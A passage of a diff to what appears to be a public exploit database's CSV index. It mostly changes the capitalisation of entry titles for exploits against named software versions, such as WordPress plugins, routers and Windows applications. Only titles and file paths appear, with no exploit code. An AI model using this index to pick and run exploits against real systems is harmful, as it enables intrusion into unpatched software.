Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 @@ -34481,7 +34481,7 @@ id,file,description,date,author,platform,type,port 38184,platforms/php/webapps/38184.txt,"TinyBrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0 -38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 +38187,platforms/php/webapps/38187.txt,"Wordpress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0 38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80 @@ -34500,7 +34500,7 @@ id,file,description,date,author,platform,type,port 38206,platforms/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart - Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 38208,platforms/multiple/dos/38208.py,"Colloquy - Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 -38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin - 'filename_1' Parameter Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 +38209,platforms/php/webapps/38209.txt,"Wordpress Gallery Plugin - 'filename_1' Parameter Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - Cross-Site Request Forgery Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted File Upload",2015-09-22,rTheory,php,webapps,80 38258,platforms/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,ios,webapps,8000 @@ -34528,7 +34528,7 @@ id,file,description,date,author,platform,type,port 38234,platforms/php/webapps/38234.txt,"DigiLIBE - Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",php,webapps,0 38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 -38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme - Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 +38237,platforms/php/webapps/38237.txt,"Wordpress Chocolate WP Theme - Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0 @@ -34541,7 +34541,7 @@ id,file,description,date,author,platform,type,port 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 -38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 +38251,platforms/php/webapps/38251.txt,"Wordpress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post-Authenticated CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 @@ -34576,29 +34576,29 @@ id,file,description,date,author,platform,type,port 38287,platforms/windows/local/38287.txt,"Kaspersky Antivirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0 38288,platforms/windows/dos/38288.txt,"Kaspersky Antivirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0 -38290,platforms/php/webapps/38290.txt,"WordPress flashnews Theme - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 +38290,platforms/php/webapps/38290.txt,"Wordpress flashnews Theme - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 38291,platforms/php/webapps/38291.txt,"EasyITSP - 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps,0 38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter Cross-Site Scripting",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 -38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",php,webapps,0 +38296,platforms/php/webapps/38296.txt,"Wordpress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 +38297,platforms/php/webapps/38297.txt,"Wordpress Wysija Newsletters Plugin - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",php,webapps,0 38298,platforms/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 - Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 -38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 -38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme - 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 +38300,platforms/php/webapps/38300.txt,"Wordpress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 +38301,platforms/php/webapps/38301.txt,"Wordpress Pinboard Theme - 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,Metasploit,multiple,remote,6667 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",osx,local,0 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 38307,platforms/win_x86/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 -38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 +38308,platforms/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 38310,platforms/android/remote/38310.c,"Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0 -38314,platforms/php/webapps/38314.txt,"WordPress NextGEN Gallery Plugin - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 +38314,platforms/php/webapps/38314.txt,"Wordpress NextGEN Gallery Plugin - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps,0 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - .qfl Crash PoC",2015-09-25,Un_N0n,windows,dos,0 @@ -34608,14 +34608,14 @@ id,file,description,date,author,platform,type,port 38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,php,webapps,80 38322,platforms/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps,0 38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 -38324,platforms/php/webapps/38324.txt,"WordPress Pretty Link Plugin - Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 +38324,platforms/php/webapps/38324.txt,"Wordpress Pretty Link Plugin - Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote,0 -38326,platforms/php/webapps/38326.txt,"Zenphoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 +38326,platforms/php/webapps/38326.txt,"ZenPhoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting",2013-02-20,MustLive,php,webapps,0 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 -38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 +38331,platforms/php/webapps/38331.txt,"Wordpress Smart Flv Plugin - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 38332,platforms/php/webapps/38332.txt,"Batavi - 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,php,webapps,0 38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0 38334,platforms/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0 @@ -34639,11 +34639,11 @@ id,file,description,date,author,platform,type,port 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution",2015-09-29,Metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Privilege Escalation",2015-09-29,halfdog,linux,local,0 38354,platforms/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 -38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin - 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 +38355,platforms/php/webapps/38355.txt,"Wordpress Uploader Plugin - 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 38356,platforms/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0 38357,platforms/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 -38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 +38359,platforms/php/webapps/38359.txt,"Wordpress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,osx,local,0 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel - Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,Metasploit,windows,remote,0 @@ -34654,18 +34654,18 @@ id,file,description,date,author,platform,type,port 38366,platforms/multiple/webapps/38366.py,"Verax NMS - Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0 38367,platforms/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",php,webapps,0 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 -38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0 +38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection",2015-10-01,neom22,hardware,webapps,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 -38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 +38371,platforms/osx/local/38371.py,"Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 38372,platforms/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 -38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id - HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 +38373,platforms/php/webapps/38373.txt,"Wordpress Terillion Reviews Plugin Profile Id - HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 38374,platforms/php/webapps/38374.txt,"SWFUpload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 -38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin - 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 +38376,platforms/php/webapps/38376.txt,"Wordpress podPress Plugin - 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 38377,platforms/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - Cross-Site Request Forgery",2015-10-02,hyp3rlinx,windows,webapps,0 -38381,platforms/windows/local/38381.py,"WinRar < 5.30 beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 +38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - .asx Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 38384,platforms/windows/remote/38384.txt,"Avast Antivirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 @@ -34677,25 +34677,25 @@ id,file,description,date,author,platform,type,port 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0 38391,platforms/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,php,webapps,0 38392,platforms/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 -38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 +38393,platforms/php/webapps/38393.html,"Wordpress Occasions Plugin - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard - '.PLF' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 -38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0 +38537,platforms/php/webapps/38537.txt,"Wordpress ADIF Log Search Widget Plugin - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0 38403,platforms/win_x86/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win_x86,local,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 -38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Remote Code Execution Through File Upload Filter Bypass",2015-10-06,"Raffaele Forte",php,webapps,0 +38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 -38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 +38410,platforms/php/webapps/38410.txt,"Wordpress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 -38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 +38414,platforms/php/webapps/38414.txt,"Wordpress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 @@ -34720,9 +34720,9 @@ id,file,description,date,author,platform,type,port 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 38438,platforms/php/webapps/38438.txt,"EasyPHP - 'index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 -38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 +38439,platforms/php/webapps/38439.txt,"Wordpress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 -38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 +38441,platforms/php/webapps/38441.txt,"Wordpress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service",2015-10-11,"Aria Akhavan Rezayat",php,dos,0 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 @@ -34732,12 +34732,12 @@ id,file,description,date,author,platform,type,port 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0 -38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0 +38455,platforms/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0 38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0 38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0 38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter Cross-Site Scripting",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 38477,platforms/php/webapps/38477.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter SQL Injection",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 -38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 +38458,platforms/php/webapps/38458.txt,"Wordpress Spider Video Player Plugin - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 38459,platforms/php/webapps/38459.txt,"Request Tracker - 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0 38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0 @@ -34748,7 +34748,7 @@ id,file,description,date,author,platform,type,port 38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0 38465,platforms/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 -38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 +38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38472,platforms/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 @@ -34759,18 +34759,18 @@ id,file,description,date,author,platform,type,port 38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 -38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 -38484,platforms/php/webapps/38484.rb,"WordPress Ajax Load More Plugin < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 